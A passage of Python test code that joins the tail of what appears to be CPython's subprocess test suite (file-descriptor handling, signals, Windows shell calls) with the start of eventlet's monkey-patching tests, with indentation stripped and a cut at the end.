temp_fds = [fd for fd, fname in temps]
# unlink the files -- we won't need to reopen them
for fd, fname in temps:
os.unlink(fname)
# write some data to what will become stdin, and rewind
os.write(temp_fds[1], b"STDIN")
os.lseek(temp_fds[1], 0, 0)
# move the standard file descriptors out of the way
saved_fds = self._save_fds(range(3))
try:
# duplicate the file objects over the standard fd's
for fd, temp_fd in enumerate(temp_fds):
os.dup2(temp_fd, fd)
# now use those files in the "wrong" order, so that subprocess
# has to rearrange them in the child
p = subprocess.Popen([sys.executable, "-c",
'import sys; got = sys.stdin.read();'
'sys.stdout.write("got %s"%got); sys.stderr.write("err")'],
stdin=temp_fds[1],
stdout=temp_fds[2],
stderr=temp_fds[0])
p.wait()
finally:
self._restore_fds(saved_fds)
for fd in temp_fds:
os.lseek(fd, 0, 0)
out = os.read(temp_fds[2], 1024)
err = support.strip_python_stderr(os.read(temp_fds[0], 1024))
self.assertEqual(out, b"got STDIN")
self.assertEqual(err, b"err")
finally:
for fd in temp_fds:
os.close(fd)
def check_swap_fds(self, stdin_no, stdout_no, stderr_no):
# open up some temporary files
temps = [mkstemp() for i in range(3)]
temp_fds = [fd for fd, fname in temps]
try:
# unlink the files -- we won't need to reopen them
for fd, fname in temps:
os.unlink(fname)
# save a copy of the standard file descriptors
saved_fds = self._save_fds(range(3))
try:
# duplicate the temp files over the standard fd's 0, 1, 2
for fd, temp_fd in enumerate(temp_fds):
os.dup2(temp_fd, fd)
# write some data to what will become stdin, and rewind
os.write(stdin_no, b"STDIN")
os.lseek(stdin_no, 0, 0)
# now use those files in the given order, so that subprocess
# has to rearrange them in the child
p = subprocess.Popen([sys.executable, "-c",
'import sys; got = sys.stdin.read();'
'sys.stdout.write("got %s"%got); sys.stderr.write("err")'],
stdin=stdin_no,
stdout=stdout_no,
stderr=stderr_no)
p.wait()
for fd in temp_fds:
os.lseek(fd, 0, 0)
out = os.read(stdout_no, 1024)
err = support.strip_python_stderr(os.read(stderr_no, 1024))
finally:
self._restore_fds(saved_fds)
self.assertEqual(out, b"got STDIN")
self.assertEqual(err, b"err")
finally:
for fd in temp_fds:
os.close(fd)
# When duping fds, if there arises a situation where one of the fds is
# either 0, 1 or 2, it is possible that it is overwritten (#12607).
# This tests all combinations of this.
def test_swap_fds(self):
self.check_swap_fds(0, 1, 2)
self.check_swap_fds(0, 2, 1)
self.check_swap_fds(1, 0, 2)
self.check_swap_fds(1, 2, 0)
self.check_swap_fds(2, 0, 1)
self.check_swap_fds(2, 1, 0)
def test_surrogates_error_message(self):
def prepare():
raise ValueError("surrogate:\uDCff")
try:
subprocess.call(
[sys.executable, "-c", "pass"],
preexec_fn=prepare)
except ValueError as err:
# Pure Python implementations keeps the message
self.assertIsNone(subprocess._posixsubprocess)
self.assertEqual(str(err), "surrogate:\uDCff")
except subprocess.SubprocessError as err:
# _posixsubprocess uses a default message
self.assertIsNotNone(subprocess._posixsubprocess)
self.assertEqual(str(err), "Exception occurred in preexec_fn.")
else:
self.fail("Expected ValueError or subprocess.SubprocessError")
def test_undecodable_env(self):
for key, value in (('test', 'abc\uDCFF'), ('test\uDCFF', '42')):
encoded_value = value.encode("ascii", "surrogateescape")
# test str with surrogates
script = "import os; print(ascii(os.getenv(%s)))" % repr(key)
env = os.environ.copy()
env[key] = value
# Use C locale to get ASCII for the locale encoding to force
# surrogate-escaping of \xFF in the child process; otherwise it can
# be decoded as-is if the default locale is latin-1.
env['LC_ALL'] = 'C'
if sys.platform.startswith("aix"):
# On AIX, the C locale uses the Latin1 encoding
decoded_value = encoded_value.decode("latin1", "surrogateescape")
else:
# On other UNIXes, the C locale uses the ASCII encoding
decoded_value = value
stdout = subprocess.check_output(
[sys.executable, "-c", script],
env=env)
stdout = stdout.rstrip(b'\n\r')
self.assertEqual(stdout.decode('ascii'), ascii(decoded_value))
# test bytes
key = key.encode("ascii", "surrogateescape")
script = "import os; print(ascii(os.getenvb(%s)))" % repr(key)
env = os.environ.copy()
env[key] = encoded_value
stdout = subprocess.check_output(
[sys.executable, "-c", script],
env=env)
stdout = stdout.rstrip(b'\n\r')
self.assertEqual(stdout.decode('ascii'), ascii(encoded_value))
def test_bytes_program(self):
abs_program = os.fsencode(sys.executable)
path, program = os.path.split(sys.executable)
program = os.fsencode(program)
# absolute bytes path
exitcode = subprocess.call([abs_program, "-c", "pass"])
self.assertEqual(exitcode, 0)
# absolute bytes path as a string
cmd = b"'" + abs_program + b"' -c pass"
exitcode = subprocess.call(cmd, shell=True)
self.assertEqual(exitcode, 0)
# bytes program, unicode PATH
env = os.environ.copy()
env["PATH"] = path
exitcode = subprocess.call([program, "-c", "pass"], env=env)
self.assertEqual(exitcode, 0)
# bytes program, bytes PATH
envb = os.environb.copy()
envb[b"PATH"] = os.fsencode(path)
exitcode = subprocess.call([program, "-c", "pass"], env=envb)
self.assertEqual(exitcode, 0)
def test_pipe_cloexec(self):
sleeper = support.findfile("input_reader.py", subdir="subprocessdata")
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
p1 = subprocess.Popen([sys.executable, sleeper],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, close_fds=False)
self.addCleanup(p1.communicate, b'')
p2 = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=False)
output, error = p2.communicate()
result_fds = set(map(int, output.split(b',')))
unwanted_fds = set([p1.stdin.fileno(), p1.stdout.fileno(),
p1.stderr.fileno()])
self.assertFalse(result_fds & unwanted_fds,
"Expected no fds from %r to be open in child, "
"found %r" %
(unwanted_fds, result_fds & unwanted_fds))
def test_pipe_cloexec_real_tools(self):
qcat = support.findfile("qcat.py", subdir="subprocessdata")
qgrep = support.findfile("qgrep.py", subdir="subprocessdata")
subdata = b'zxcvbn'
data = subdata * 4 + b'\n'
p1 = subprocess.Popen([sys.executable, qcat],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
close_fds=False)
p2 = subprocess.Popen([sys.executable, qgrep, subdata],
stdin=p1.stdout, stdout=subprocess.PIPE,
close_fds=False)
self.addCleanup(p1.wait)
self.addCleanup(p2.wait)
def kill_p1():
try:
p1.terminate()
except ProcessLookupError:
pass
def kill_p2():
try:
p2.terminate()
except ProcessLookupError:
pass
self.addCleanup(kill_p1)
self.addCleanup(kill_p2)
p1.stdin.write(data)
p1.stdin.close()
readfiles, ignored1, ignored2 = select.select([p2.stdout], [], [], 10)
self.assertTrue(readfiles, "The child hung")
self.assertEqual(p2.stdout.read(), data)
p1.stdout.close()
p2.stdout.close()
def test_close_fds(self):
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
fds = os.pipe()
self.addCleanup(os.close, fds[0])
self.addCleanup(os.close, fds[1])
open_fds = set(fds)
# add a bunch more fds
for _ in range(9):
fd = os.open(os.devnull, os.O_RDONLY)
self.addCleanup(os.close, fd)
open_fds.add(fd)
for fd in open_fds:
os.set_inheritable(fd, True)
p = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=False)
output, ignored = p.communicate()
remaining_fds = set(map(int, output.split(b',')))
self.assertEqual(remaining_fds & open_fds, open_fds,
"Some fds were closed")
p = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=True)
output, ignored = p.communicate()
remaining_fds = set(map(int, output.split(b',')))
self.assertFalse(remaining_fds & open_fds,
"Some fds were left open")
self.assertIn(1, remaining_fds, "Subprocess failed")
# Keep some of the fd's we opened open in the subprocess.
# This tests _posixsubprocess.c's proper handling of fds_to_keep.
fds_to_keep = set(open_fds.pop() for _ in range(8))
p = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=True,
pass_fds=())
output, ignored = p.communicate()
remaining_fds = set(map(int, output.split(b',')))
self.assertFalse(remaining_fds & fds_to_keep & open_fds,
"Some fds not in pass_fds were left open")
self.assertIn(1, remaining_fds, "Subprocess failed")
@unittest.skipIf(sys.platform.startswith("freebsd") and
os.stat("/dev").st_dev == os.stat("/dev/fd").st_dev,
"Requires fdescfs mounted on /dev/fd on FreeBSD.")
def test_close_fds_when_max_fd_is_lowered(self):
"""Confirm that issue21618 is fixed (may fail under valgrind)."""
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
# This launches the meat of the test in a child process to
# avoid messing with the larger unittest processes maximum
# number of file descriptors.
# This process launches:
# +--> Process that lowers its RLIMIT_NOFILE aftr setting up
# a bunch of high open fds above the new lower rlimit.
# Those are reported via stdout before launching a new
# process with close_fds=False to run the actual test:
# +--> The TEST: This one launches a fd_status.py
# subprocess with close_fds=True so we can find out if
# any of the fds above the lowered rlimit are still open.
p = subprocess.Popen([sys.executable, '-c', textwrap.dedent(
'''
import os, resource, subprocess, sys, textwrap
open_fds = set()
# Add a bunch more fds to pass down.
for _ in range(40):
fd = os.open(os.devnull, os.O_RDONLY)
open_fds.add(fd)
# Leave a two pairs of low ones available for use by the
# internal child error pipe and the stdout pipe.
# We also leave 10 more open as some Python buildbots run into
# "too many open files" errors during the test if we do not.
for fd in sorted(open_fds)[:14]:
os.close(fd)
open_fds.remove(fd)
for fd in open_fds:
#self.addCleanup(os.close, fd)
os.set_inheritable(fd, True)
max_fd_open = max(open_fds)
# Communicate the open_fds to the parent unittest.TestCase process.
print(','.join(map(str, sorted(open_fds))))
sys.stdout.flush()
rlim_cur, rlim_max = resource.getrlimit(resource.RLIMIT_NOFILE)
try:
# 29 is lower than the highest fds we are leaving open.
resource.setrlimit(resource.RLIMIT_NOFILE, (29, rlim_max))
# Launch a new Python interpreter with our low fd rlim_cur that
# inherits open fds above that limit. It then uses subprocess
# with close_fds=True to get a report of open fds in the child.
# An explicit list of fds to check is passed to fd_status.py as
# letting fd_status rely on its default logic would miss the
# fds above rlim_cur as it normally only checks up to that limit.
subprocess.Popen(
[sys.executable, '-c',
textwrap.dedent("""
import subprocess, sys
subprocess.Popen([sys.executable, %r] +
[str(x) for x in range({max_fd})],
close_fds=True).wait()
""".format(max_fd=max_fd_open+1))],
close_fds=False).wait()
finally:
resource.setrlimit(resource.RLIMIT_NOFILE, (rlim_cur, rlim_max))
''' % fd_status)], stdout=subprocess.PIPE)
output, unused_stderr = p.communicate()
output_lines = output.splitlines()
self.assertEqual(len(output_lines), 2,
msg="expected exactly two lines of output:\n%r" % output)
opened_fds = set(map(int, output_lines[0].strip().split(b',')))
remaining_fds = set(map(int, output_lines[1].strip().split(b',')))
self.assertFalse(remaining_fds & opened_fds,
msg="Some fds were left open.")
# Mac OS X Tiger (10.4) has a kernel bug: sometimes, the file
# descriptor of a pipe closed in the parent process is valid in the
# child process according to fstat(), but the mode of the file
# descriptor is invalid, and read or write raise an error.
@support.requires_mac_ver(10, 5)
def test_pass_fds(self):
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
open_fds = set()
for x in range(5):
fds = os.pipe()
self.addCleanup(os.close, fds[0])
self.addCleanup(os.close, fds[1])
os.set_inheritable(fds[0], True)
os.set_inheritable(fds[1], True)
open_fds.update(fds)
for fd in open_fds:
p = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=True,
pass_fds=(fd, ))
output, ignored = p.communicate()
remaining_fds = set(map(int, output.split(b',')))
to_be_closed = open_fds - {fd}
self.assertIn(fd, remaining_fds, "fd to be passed not passed")
self.assertFalse(remaining_fds & to_be_closed,
"fd to be closed passed")
# pass_fds overrides close_fds with a warning.
with self.assertWarns(RuntimeWarning) as context:
self.assertFalse(subprocess.call(
[sys.executable, "-c", "import sys; sys.exit(0)"],
close_fds=False, pass_fds=(fd, )))
self.assertIn('overriding close_fds', str(context.warning))
def test_pass_fds_inheritable(self):
script = support.findfile("fd_status.py", subdir="subprocessdata")
inheritable, non_inheritable = os.pipe()
self.addCleanup(os.close, inheritable)
self.addCleanup(os.close, non_inheritable)
os.set_inheritable(inheritable, True)
os.set_inheritable(non_inheritable, False)
pass_fds = (inheritable, non_inheritable)
args = [sys.executable, script]
args += list(map(str, pass_fds))
p = subprocess.Popen(args,
stdout=subprocess.PIPE, close_fds=True,
pass_fds=pass_fds)
output, ignored = p.communicate()
fds = set(map(int, output.split(b',')))
# the inheritable file descriptor must be inherited, so its inheritable
# flag must be set in the child process after fork() and before exec()
self.assertEqual(fds, set(pass_fds), "output=%a" % output)
# inheritable flag must not be changed in the parent process
self.assertEqual(os.get_inheritable(inheritable), True)
self.assertEqual(os.get_inheritable(non_inheritable), False)
def test_stdout_stdin_are_single_inout_fd(self):
with io.open(os.devnull, "r+") as inout:
p = subprocess.Popen([sys.executable, "-c", "import sys; sys.exit(0)"],
stdout=inout, stdin=inout)
p.wait()
def test_stdout_stderr_are_single_inout_fd(self):
with io.open(os.devnull, "r+") as inout:
p = subprocess.Popen([sys.executable, "-c", "import sys; sys.exit(0)"],
stdout=inout, stderr=inout)
p.wait()
def test_stderr_stdin_are_single_inout_fd(self):
with io.open(os.devnull, "r+") as inout:
p = subprocess.Popen([sys.executable, "-c", "import sys; sys.exit(0)"],
stderr=inout, stdin=inout)
p.wait()
def test_wait_when_sigchild_ignored(self):
# NOTE: sigchild_ignore.py may not be an effective test on all OSes.
sigchild_ignore = support.findfile("sigchild_ignore.py",
subdir="subprocessdata")
p = subprocess.Popen([sys.executable, sigchild_ignore],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
self.assertEqual(0, p.returncode, "sigchild_ignore.py exited"
" non-zero with this error:\n%s" %
stderr.decode('utf-8'))
def test_select_unbuffered(self):
# Issue #11459: bufsize=0 should really set the pipes as
# unbuffered (and therefore let select() work properly).
select = support.import_module("select")
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdout.write("apple")'],
stdout=subprocess.PIPE,
bufsize=0)
f = p.stdout
self.addCleanup(f.close)
try:
self.assertEqual(f.read(4), b"appl")
self.assertIn(f, select.select([f], [], [], 0.0)[0])
finally:
p.wait()
def test_zombie_fast_process_del(self):
# Issue #12650: on Unix, if Popen.__del__() was called before the
# process exited, it wouldn't be added to subprocess._active, and would
# remain a zombie.
# spawn a Popen, and delete its reference before it exits
p = subprocess.Popen([sys.executable, "-c",
'import sys, time;'
'time.sleep(0.2)'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
ident = id(p)
pid = p.pid
del p
# check that p is in the active processes list
self.assertIn(ident, [id(o) for o in subprocess._active])
def test_leak_fast_process_del_killed(self):
# Issue #12650: on Unix, if Popen.__del__() was called before the
# process exited, and the process got killed by a signal, it would never
# be removed from subprocess._active, which triggered a FD and memory
# leak.
# spawn a Popen, delete its reference and kill it
p = subprocess.Popen([sys.executable, "-c",
'import time;'
'time.sleep(3)'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
ident = id(p)
pid = p.pid
del p
os.kill(pid, signal.SIGKILL)
# check that p is in the active processes list
self.assertIn(ident, [id(o) for o in subprocess._active])
# let some time for the process to exit, and create a new Popen: this
# should trigger the wait() of p
time.sleep(0.2)
with self.assertRaises(OSError) as c:
with subprocess.Popen(['nonexisting_i_hope'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE) as proc:
pass
# p should have been wait()ed on, and removed from the _active list
self.assertRaises(OSError, os.waitpid, pid, 0)
self.assertNotIn(ident, [id(o) for o in subprocess._active])
def test_close_fds_after_preexec(self):
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
# this FD is used as dup2() target by preexec_fn, and should be closed
# in the child process
fd = os.dup(1)
self.addCleanup(os.close, fd)
p = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=True,
preexec_fn=lambda: os.dup2(1, fd))
output, ignored = p.communicate()
remaining_fds = set(map(int, output.split(b',')))
self.assertNotIn(fd, remaining_fds)
@support.cpython_only
def test_fork_exec(self):
# Issue #22290: fork_exec() must not crash on memory allocation failure
# or other errors
import _posixsubprocess
gc_enabled = gc.isenabled()
try:
# Use a preexec function and enable the garbage collector
# to force fork_exec() to re-enable the garbage collector
# on error.
func = lambda: None
gc.enable()
executable_list = "exec" # error: must be a sequence
for args, exe_list, cwd, env_list in (
(123, [b"exe"], None, [b"env"]),
([b"arg"], 123, None, [b"env"]),
([b"arg"], [b"exe"], 123, [b"env"]),
([b"arg"], [b"exe"], None, 123),
):
with self.assertRaises(TypeError):
_posixsubprocess.fork_exec(
args, exe_list,
True, [], cwd, env_list,
-1, -1, -1, -1,
1, 2, 3, 4,
True, True, func)
finally:
if not gc_enabled:
gc.disable()
@unittest.skipUnless(mswindows, "Windows specific tests")
class Win32ProcessTestCase(BaseTestCase):
def test_startupinfo(self):
# startupinfo argument
# We uses hardcoded constants, because we do not want to
# depend on win32all.
STARTF_USESHOWWINDOW = 1
SW_MAXIMIZE = 3
startupinfo = subprocess.STARTUPINFO()
startupinfo.dwFlags = STARTF_USESHOWWINDOW
startupinfo.wShowWindow = SW_MAXIMIZE
# Since Python is a console process, it won't be affected
# by wShowWindow, but the argument should be silently
# ignored
subprocess.call([sys.executable, "-c", "import sys; sys.exit(0)"],
startupinfo=startupinfo)
def test_creationflags(self):
# creationflags argument
CREATE_NEW_CONSOLE = 16
sys.stderr.write(" a DOS box should flash briefly ...\n")
subprocess.call(sys.executable +
' -c "import time; time.sleep(0.25)"',
creationflags=CREATE_NEW_CONSOLE)
def test_invalid_args(self):
# invalid arguments should raise ValueError
self.assertRaises(ValueError, subprocess.call,
[sys.executable, "-c",
"import sys; sys.exit(47)"],
preexec_fn=lambda: 1)
self.assertRaises(ValueError, subprocess.call,
[sys.executable, "-c",
"import sys; sys.exit(47)"],
stdout=subprocess.PIPE,
close_fds=True)
def test_close_fds(self):
# close file descriptors
rc = subprocess.call([sys.executable, "-c",
"import sys; sys.exit(47)"],
close_fds=True)
self.assertEqual(rc, 47)
def test_shell_sequence(self):
# Run command through the shell (sequence)
newenv = os.environ.copy()
newenv["FRUIT"] = "physalis"
p = subprocess.Popen(["set"], shell=1,
stdout=subprocess.PIPE,
env=newenv)
self.addCleanup(p.stdout.close)
self.assertIn(b"physalis", p.stdout.read())
def test_shell_string(self):
# Run command through the shell (string)
newenv = os.environ.copy()
newenv["FRUIT"] = "physalis"
p = subprocess.Popen("set", shell=1,
stdout=subprocess.PIPE,
env=newenv)
self.addCleanup(p.stdout.close)
self.assertIn(b"physalis", p.stdout.read())
def test_call_string(self):
# call() function with string argument on Windows
rc = subprocess.call(sys.executable +
' -c "import sys; sys.exit(47)"')
self.assertEqual(rc, 47)
def _kill_process(self, method, *args):
# Some win32 buildbot raises EOFError if stdin is inherited
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, time
sys.stdout.write('x\\n')
sys.stdout.flush()
time.sleep(30)
"""],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
# Wait for the interpreter to be completely initialized before
# sending any signal.
p.stdout.read(1)
getattr(p, method)(*args)
_, stderr = p.communicate()
self.assertStderrEqual(stderr, b'')
returncode = p.wait()
self.assertNotEqual(returncode, 0)
def _kill_dead_process(self, method, *args):
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, time
sys.stdout.write('x\\n')
sys.stdout.flush()
sys.exit(42)
"""],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
# Wait for the interpreter to be completely initialized before
# sending any signal.
p.stdout.read(1)
# The process should end after this
time.sleep(1)
# This shouldn't raise even though the child is now dead
getattr(p, method)(*args)
_, stderr = p.communicate()
self.assertStderrEqual(stderr, b'')
rc = p.wait()
self.assertEqual(rc, 42)
def test_send_signal(self):
self._kill_process('send_signal', signal.SIGTERM)
def test_kill(self):
self._kill_process('kill')
def test_terminate(self):
self._kill_process('terminate')
def test_send_signal_dead(self):
self._kill_dead_process('send_signal', signal.SIGTERM)
def test_kill_dead(self):
self._kill_dead_process('kill')
def test_terminate_dead(self):
self._kill_dead_process('terminate')
class CommandTests(unittest.TestCase):
def test_getoutput(self):
self.assertEqual(subprocess.getoutput('echo xyzzy'), 'xyzzy')
self.assertEqual(subprocess.getstatusoutput('echo xyzzy'),
(0, 'xyzzy'))
# we use mkdtemp in the next line to create an empty directory
# under our exclusive control; from that, we can invent a pathname
# that we _know_ won't exist. This is guaranteed to fail.
dir = None
try:
dir = tempfile.mkdtemp()
name = os.path.join(dir, "foo")
status, output = subprocess.getstatusoutput(
("type " if mswindows else "cat ") + name)
self.assertNotEqual(status, 0)
finally:
if dir is not None:
os.rmdir(dir)
@unittest.skipUnless(hasattr(selectors, 'PollSelector'),
"Test needs selectors.PollSelector")
class ProcessTestCaseNoPoll(ProcessTestCase):
def setUp(self):
self.orig_selector = subprocess._PopenSelector
subprocess._PopenSelector = selectors.SelectSelector
ProcessTestCase.setUp(self)
def tearDown(self):
subprocess._PopenSelector = self.orig_selector
ProcessTestCase.tearDown(self)
def test__all__(self):
"""Ensure that __all__ is populated properly."""
intentionally_excluded = set(("list2cmdline",))
exported = set(subprocess.__all__)
possible_exports = set()
import types
for name, value in subprocess.__dict__.items():
if name.startswith('_'):
continue
if isinstance(value, (types.ModuleType,)):
continue
possible_exports.add(name)
self.assertEqual(exported, possible_exports - intentionally_excluded)
@unittest.skipUnless(mswindows, "Windows-specific tests")
class CommandsWithSpaces (BaseTestCase):
def setUp(self):
super().setUp()
f, fname = mkstemp(".py", "te st")
self.fname = fname.lower ()
os.write(f, b"import sys;"
b"sys.stdout.write('%d %s' % (len(sys.argv), [a.lower () for a in sys.argv]))"
)
os.close(f)
def tearDown(self):
os.remove(self.fname)
super().tearDown()
def with_spaces(self, *args, **kwargs):
kwargs['stdout'] = subprocess.PIPE
p = subprocess.Popen(*args, **kwargs)
self.addCleanup(p.stdout.close)
self.assertEqual(
p.stdout.read ().decode("mbcs"),
"2 [%r, 'ab cd']" % self.fname
)
def test_shell_string_with_spaces(self):
# call() function with string argument with spaces on Windows
self.with_spaces('"%s" "%s" "%s"' % (sys.executable, self.fname,
"ab cd"), shell=1)
def test_shell_sequence_with_spaces(self):
# call() function with sequence argument with spaces on Windows
self.with_spaces([sys.executable, self.fname, "ab cd"], shell=1)
def test_noshell_string_with_spaces(self):
# call() function with string argument with spaces on Windows
self.with_spaces('"%s" "%s" "%s"' % (sys.executable, self.fname,
"ab cd"))
def test_noshell_sequence_with_spaces(self):
# call() function with sequence argument with spaces on Windows
self.with_spaces([sys.executable, self.fname, "ab cd"])
class ContextManagerTests(BaseTestCase):
def test_pipe(self):
with subprocess.Popen([sys.executable, "-c",
"import sys;"
"sys.stdout.write('stdout');"
"sys.stderr.write('stderr');"],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE) as proc:
self.assertEqual(proc.stdout.read(), b"stdout")
self.assertStderrEqual(proc.stderr.read(), b"stderr")
self.assertTrue(proc.stdout.closed)
self.assertTrue(proc.stderr.closed)
def test_returncode(self):
with subprocess.Popen([sys.executable, "-c",
"import sys; sys.exit(100)"]) as proc:
pass
# __exit__ calls wait(), so the returncode should be set
self.assertEqual(proc.returncode, 100)
def test_communicate_stdin(self):
with subprocess.Popen([sys.executable, "-c",
"import sys;"
"sys.exit(sys.stdin.read() == 'context')"],
stdin=subprocess.PIPE) as proc:
proc.communicate(b"context")
self.assertEqual(proc.returncode, 1)
def test_invalid_args(self):
with self.assertRaises(FileNotFoundError) as c:
with subprocess.Popen(['nonexisting_i_hope'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE) as proc:
pass
def test_broken_pipe_cleanup(self):
"""Broken pipe error should not prevent wait() (Issue 21619)"""
proc = subprocess.Popen([sys.executable, '-c', 'pass'],
stdin=subprocess.PIPE,
bufsize=support.PIPE_MAX_SIZE*2)
proc = proc.__enter__()
# Prepare to send enough data to overflow any OS pipe buffering and
# guarantee a broken pipe error. Data is held in BufferedWriter
# buffer until closed.
proc.stdin.write(b'x' * support.PIPE_MAX_SIZE)
self.assertIsNone(proc.returncode)
# EPIPE expected under POSIX; EINVAL under Windows
self.assertRaises(OSError, proc.__exit__, None, None, None)
self.assertEqual(proc.returncode, 0)
self.assertTrue(proc.stdin.closed)
def test_main():
unit_tests = (ProcessTestCase,
POSIXProcessTestCase,
Win32ProcessTestCase,
CommandTests,
ProcessTestCaseNoPoll,
CommandsWithSpaces,
ContextManagerTests,
RunFuncTestCase,
)
support.run_unittest(*unit_tests)
support.reap_children()
if __name__ == "__main__":
unittest.main()
|
patcher_test.py
|
import os
import shutil
import sys
import tempfile
import six
import tests
base_module_contents = """
import socket
import urllib
print("base {0} {1}".format(socket, urllib))
"""
patching_module_contents = """
from eventlet.green import socket
from eventlet.green import urllib
from eventlet import patcher
print('patcher {0} {1}'.format(socket, urllib))
patcher.inject('base', globals(), ('socket', socket), ('urllib', urllib))
del patcher
"""
import_module_contents = """
import patching
import socket
print("importing {0} {1} {2} {3}".format(patching, socket, patching.socket, patching.urllib))
"""
class ProcessBase(tests.LimitedTestCase):
TEST_TIMEOUT = 3 # starting processes is time-consuming
def setUp(self):
super(ProcessBase, self).setUp()
self._saved_syspath = sys.path
self.tempdir = tempfile.mkdtemp('_patcher_test')
def tearDown(self):
super(ProcessBase, self).tearDown()
sys.path = self._saved_syspath
shutil.rmtree(self.tempdir)
def write_to_tempfile(self, name, contents):
filename = os.path.join(self.tempdir, name)
if not filename.endswith('.py'):
filename = filename + '.py'
with open(filename, "w") as fd:
fd.write(contents)
def launch_subprocess(self, filename):
path = os.path.join(self.tempdir, filename)
output = tests.run_python(path)
if six.PY3:
output = output.decode('utf-8')
separator = '\n'
else:
separator = b'\n'
lines = output.split(separator)
return output, lines
def run_script(self, contents, modname=None):
if modname is None:
modname = "testmod"
self.write_to_tempfile(modname, contents)
return self.launch_subprocess(modname)
class ImportPatched(ProcessBase):
def test_patch_a_module(self):
self.write_to_tempfile("base", base_module_contents)
self.write_to_tempfile("patching", patching_module_contents)
self.write_to_tempfile("importing", import_module_contents)
output, lines = self.launch_subprocess('importing.py')
assert lines[0].startswith('patcher'), repr(output)
assert lines[1].startswith('base'), repr(output)
assert lines[2].startswith('importing'), repr(output)
assert 'eventlet.green.socket' in lines[1], repr(output)
assert 'eventlet.green.urllib' in lines[1], repr(output)
assert 'eventlet.green.socket' in lines[2], repr(output)
assert 'eventlet.green.urllib' in lines[2], repr(output)
assert 'eventlet.green.httplib' not in lines[2], repr(output)
def test_import_patched_defaults():
tests.run_isolated('patcher_import_patched_defaults.py')
def test_import_patched_handles_sub_modules():
tests.run_isolated('test_sub_module_in_import_patched/test.py')
class MonkeyPatch(ProcessBase):
def test_patched_modules(self):
new_mod = """
from eventlet import patcher
patcher.monkey_patch()
import socket
try:
import urllib.request as urllib
except ImportError:
import urllib
print("newmod {0} {1}".format(socket.socket, urllib.socket.socket))
"""
self.write_to_tempfile("newmod", new_mod)
output, lines = self.launch_subprocess('newmod.py')
assert lines[0].startswith('newmod'), repr(output)
self.assertEqual(lines[0].count('GreenSocket'), 2, repr(output))
def test_early_patching(self):
new_mod = """
from eventlet import patcher
patcher.monkey_patch()
import eventlet
eventlet.sleep(0.01)
print("newmod")
"""
self.write_to_tempfile("newmod", new_mod)
output, lines = self.launch_subprocess('newmod.py')
self.assertEqual(len(lines), 2, repr(output))
assert lines[0].startswith('newmod'), repr(output)
def test_late_patching(self):
new_mod = """
import eventlet
eventlet.sleep(0.01)
from eventlet import patcher
patcher.monkey_patch()
eventlet.sleep(0.01)
print("newmod")
"""
self.write_to_tempfile("newmod", new_mod)
output, lines = self.launch_subprocess('newmod.py')
self.assertEqual(len(lines), 2, repr(output))
assert lines[0].startswith('newmod'), repr(output)
def test_typeerror(self):
new_mod = """
from eventlet import patcher
patcher.monkey_patch(finagle=True)
"""
self.write_to_tempfile("newmod", new_mod)
output, lines = self.launch_subprocess('newmod.py')
assert lines[-2].startswith('TypeError'), repr(output)
assert 'finagle' in lines[-2], repr(output)
def assert_boolean_logic(self, call, expected, not_expected=''):
expected_list = ", ".join(['"%s"' % x for x in expected.split(',') if len(x)])
not_expected_list = ", ".join(['"%s"' % x for x in not_expected.split(',') if len(x)])
new_mod = """
from eventlet import patcher
%s
for mod in [%s]:
assert patcher.is_monkey_patched(mod), mod
for mod in [%s]:
assert not patcher.is_monkey_patched(mod), mod
print("already_patched {0}".format(",".join(sorted(patcher.already_patched.keys()))))
""" % (call, expected_list, not_expected_list)
self.write_to_tempfile("newmod", new_mod)
output, lines = self.launch_subprocess('newmod.py')
ap = 'already_patched'
assert lines[0].startswith(ap), repr(output)
patched_modules = lines[0][len(ap):].strip()
# psycopg might or might not be patched based on installed modules
patched_modules = patched_modules.replace("psycopg,", "")
# ditto for MySQLdb
patched_modules = patched_modules.replace("MySQLdb,", "")
self.assertEqual(
patched_modules, expected,
"Logic:%s\nExpected: %s != %s" % (call, expected, patched_modules))
def test_boolean(self):
self.assert_boolean_logic("patcher.monkey_patch()",
'os,select,socket,subprocess,thread,time')
def test_boolean_all(self):
self.assert_boolean_logic("patcher.monkey_patch(all=True)",
'os,select,socket,subprocess,thread,time')
def test_boolean_all_single(self):
self.assert_boolean_logic("patcher.monkey_patch(all=True, socket=True)",
'os,select,socket,subprocess,thread,time')
def test_boolean_all_negative(self):
self.assert_boolean_logic(
"patcher.monkey_patch(all=False, socket=False, select=True)",
'select')
def test_boolean_single(self):
self.assert_boolean_logic("patcher.monkey_patch(socket=True)",
'socket')
def test_boolean_double(self):
self.assert_boolean_logic("patcher.monkey_patch(socket=True, select=True)",
'select,socket')
def test_boolean_negative(self):
